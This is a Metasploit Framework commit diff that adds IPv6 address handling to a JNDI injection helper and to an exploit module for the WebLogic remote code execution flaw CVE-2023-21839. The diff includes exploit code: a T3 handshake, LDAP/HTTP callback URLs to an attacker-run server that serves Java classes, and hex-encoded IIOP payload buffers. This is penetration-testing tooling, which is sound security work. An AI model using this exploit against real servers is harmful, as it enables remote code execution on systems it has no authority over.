Add more IPv6 support in to the module

2023-06-09 12:24:35 -05:00 · 2023-06-09 12:24:35 -05:00 · 694c1006e4
parent 7ca7c6aee1
commit 694c1006e4
3 changed files with 11 additions and 14 deletions
--- a/Gemfile.lock
+++ b/Gemfile.lock
@ -384,7 +384,7 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.51)
+    rex-socket (0.1.52)
      rex-core
    rex-sslscan (0.1.9)
      rex-core
--- a/lib/msf/core/exploit/remote/jndi_injection.rb
+++ b/lib/msf/core/exploit/remote/jndi_injection.rb
@ -29,7 +29,7 @@ module Exploit::Remote::JndiInjection
  # @return [String] the JNDI string
  def jndi_string(resource = nil)
    resource ||= "dc=#{Rex::Text.rand_text_alpha_lower(6)},dc=#{Rex::Text.rand_text_alpha_lower(3)}"
-    "ldap://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{resource}"
+    "ldap://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{resource}"
  end

  ## LDAP service callbacks
--- a/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
+++ b/modules/exploits/multi/iiop/cve_2023_21839_weblogic_rce.rb
@ -299,7 +299,7 @@ class MetasploitModule < Msf::Exploit::Remote
  # Want to just point this to the base of our install. WebLogic will append *CLASS NAME*.class to the end of
  # this URL when it tries to fetch the class to be loaded and instantiated.
  def ldap_url_string
-    "http#{datastore['SSL'] ? 's' : ''}://#{datastore['SRVHOST']}:#{datastore['HTTP_SRVPORT']}/"
+    "http#{datastore['SSL'] ? 's' : ''}://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['HTTP_SRVPORT'])}/"
  end

  #
@ -334,14 +334,7 @@ class MetasploitModule < Msf::Exploit::Remote

    netloc = opts['ServerHost'] || bindhost
    http_srvport = (opts['ServerPort'] || bindport).to_i
-    if (proto == 'http' && http_srvport != 80) || (proto == 'https' && http_srvport != 443)
-      if Rex::Socket.is_ipv6?(netloc)
-        netloc = "[#{netloc}]:#{http_srvport}"
-      else
-        netloc = "#{netloc}:#{http_srvport}"
-      end
-    end
-    print_status("Serving Java code on: #{proto}://#{netloc}#{uopts['Path']}")
+    print_status("Serving Java code on: #{proto}://#{Rex::Socket.to_authority(netloc, http_srvport)}#{uopts['Path']}")

    # Add path to resource
    @service_path = uopts['Path']
@ -404,6 +397,10 @@ class MetasploitModule < Msf::Exploit::Remote

  # Main Exploit
  def exploit
+    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+      fail_with(Failure::BadConfig, 'SRVHOST must be set to a routable address!')
+    end
+
    if @version.blank?
      @version = get_weblogic_version
    end
@ -411,7 +408,7 @@ class MetasploitModule < Msf::Exploit::Remote
    # Step 1 - Make T3 connection to start IIOP connection process, and read response.
    socket = connect
    print_status('1. Making T3 connection...')
-    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{datastore['RHOST']}:#{datastore['RPORT']}\n\n")
+    socket.put("t3 9.2.0.0\nAS:255\nHL:92\nMS:10000000\nPU:t3://#{Rex::Socket.to_authority(datastore['RHOST'], datastore['RPORT'])}\n\n")
    _buf = socket.get
    disconnect
    print_good('Made T3 connection!')
@ -490,7 +487,7 @@ class MetasploitModule < Msf::Exploit::Remote
    key1 = locate_buf[foff...foff + 8]
    key2 = "\xff\xff\xff\xff" + locate_buf[foff + 4...foff + 8]

-    if @version.between?(Rex::Version.new('12.0.0.0.0'), Rex::Version.new('12.9999999.999999.999999.99999'))
+    if @version >= Rex::Version.new('12') && @version < Rex::Version.new('13')
      wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49" \
                  "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
                  "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x02\x38\x00\x00\x00\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
@ -499,7 +496,7 @@ class MetasploitModule < Msf::Exploit::Remote
                  "\x44\x4c\x3a\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d\x69\x6e\x67\x43" \
                  "\x6f\x6e\x74\x65\x78\x74\x41\x6e\x79\x3a\x31\x2e\x30\x00\x00\x00\x00\x00\x04{{key3}}\x00\x00\x00\x01\x42\x45\x41\x2c\x00\x00\x00\x10\x00" \
                  "\x00\x00\x00\x00\x00\x00\x00{{key1}}"
-    elsif @version.between?(Rex::Version.new('14.0.0.0.0'), Rex::Version.new('14.9999999.999999.999999.99999'))
+    elsif @version >= Rex::Version.new('14') && @version < Rex::Version.new('15')
      wls_key_1 = "\x00\x42\x45\x41\x08\x01\x03\x00\x00\x00\x00\x0c\x41\x64" \
                  "\x6d\x69\x6e\x53\x65\x72\x76\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x33\x49\x44\x4c\x3a\x77\x65\x62\x6c" \
                  "\x6f\x67\x69\x63\x2f\x63\x6f\x72\x62\x61\x2f\x63\x6f\x73\x2f\x6e\x61\x6d\x69\x6e\x67\x2f\x4e\x61\x6d" \